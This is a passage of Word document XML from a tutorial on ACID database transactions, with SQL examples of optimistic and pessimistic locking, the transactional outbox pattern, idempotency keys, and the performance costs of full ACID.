    <w:p w14:paraId="06AC9777" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - CockroachDB/Spanner: distributed ACID (scalable + correct)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263B70F8" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - MongoDB 4.0+: multi-document ACID transactions (NoSQL + ACID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5169B189" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - DynamoDB: single-item ACID, TransactWriteItems for multi-item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECCADA2" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:pict w14:anchorId="72E5ED35">
          <v:rect id="_x0000_i6702" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2E0A06" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>9. ACID in Practice — Common Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4370C8" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 Optimistic Locking (Application-Level)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284A7203" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B04B043" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- Read with version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEAC5A5" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>SELECT id, balance, version FROM accounts WHERE id = 'Alice';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AD137A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- Returns: id='Alice', balance=500, version=7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D0DC34" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="1B9C892B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- Application computes new balance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F46EBAB" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- new_balance = 500 - 100 = 400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECBF00A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="30C47F35" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- Write with version check (optimistic: assume no conflict)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D50EA58" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>UPDATE accounts SET balance = 400, version = 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243B26DC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>WHERE id = 'Alice' AND version = 7;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4E8730" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="3BA4F7EE" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- If 0 rows affected: someone else updated first → CONFLICT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C847D8" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- Application retries: re-read, re-compute, re-try update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1878EFE7" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:t> No locks held during computation. High concurrency. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:t> Must handle retries. Wasted work on conflicts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729840DD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 Pessimistic Locking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FD5738" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7307DFC6" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>BEGIN;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1020A65E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- Lock the row immediately (others must wait)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9B2C4E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>SELECT balance FROM accounts WHERE id = 'Alice' FOR UPDATE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFF831B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- Row is exclusively locked for this transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B556352" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="15D029B1" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- Compute (safe — nobody else can modify this row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDC2A2A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t>-- new_balance = 500 - 100 = 400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324A764F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="6DA981A6" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>UPDATE accounts SET balance = 400 WHERE id = 'Alice';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADFAC0D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>COMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D8342F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- Lock released</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E56B12A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:t> No retries needed. Guaranteed to succeed. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:t> Others blocked while lock held. Deadlock risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED753AD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.3 Transactional Outbox Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B1EF43" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0634A7E6" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- Problem: Need to update DB AND publish event atomically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D19CBC4" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- Can't do cross-system transaction (DB + Kafka).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AAF44C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="266AD623" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- Solution: Write both to the DATABASE in one transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA5BDFA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>BEGIN;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507601AD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  UPDATE accounts SET balance = balance - 100 WHERE id = 'Alice';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2B2C61" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  INSERT INTO outbox (id, event_type, payload, created_at)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4552599C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    VALUES (uuid(), 'TRANSFER', '{"from":"Alice","amount":100}', now());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03447D62" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>COMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758AC58E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="67C9D830" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- Separate process (CDC or poller) reads outbox and publishes to Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4577A718" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- If publish succeeds → mark outbox entry as processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A520EA6" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- If publish fails → retry (message is still in outbox).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5908C25B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="401504E9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- Result: DB update and event are NEVER inconsistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016A2F0C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.4 Idempotent Transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619B8F03" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA5403" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t>-- Problem: Client retries after timeout (doesn't know if first attempt committed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1805C7F1" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- Solution: Idempotency key stored in DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D41BA7" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="5435AADC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>BEGIN;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E8A7EB" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  -- Check if already processed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7EAEB9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  INSERT INTO processed_requests (idempotency_key, result, created_at)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6001CC91" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    VALUES ('req-abc123', NULL, now())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4011BCF4" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    ON CONFLICT (idempotency_key) DO NOTHING;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038AB429" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2E425C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  -- If insert succeeded (new request): process it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B4CFD7" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  -- If insert conflicted (duplicate): return cached result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B962DDF" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6A716C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  -- Process...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8DF28E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  UPDATE accounts SET balance = balance - 100 WHERE id = 'Alice';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299F25E0" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597CD89E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  -- Store result for future duplicate requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258F01DD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  UPDATE processed_requests SET result = '{"status":"success","new_balance":400}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A47344D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    WHERE idempotency_key = 'req-abc123';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AE76F2" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>COMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7815D6E3" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:pict w14:anchorId="79CA0A14">
          <v:rect id="_x0000_i6703" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E1AC69" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. When ACID Is Expensive — Tradeoffs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A0325B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 Performance Cost of Full ACID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B88A6E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A34860" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Full ACID (Serializable + fsync):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1C3703" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Every commit: disk fsync (~0.5-2ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E77210A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Contention: Serializable aborts/blocks reduce concurrency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3B6A41" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Distributed: 2PC adds round trips across network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51680F7C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2026FA04" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Single-node throughput: ~500-5000 TPS (disk-bound)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1252297F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Distributed: ~100-1000 TPS (coordination-bound)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750EAFE5" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="4F7EDE53" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Relaxed ACID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5123F2FD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Read Committed (lower isolation): 10x throughput improvement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2DAFC5" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
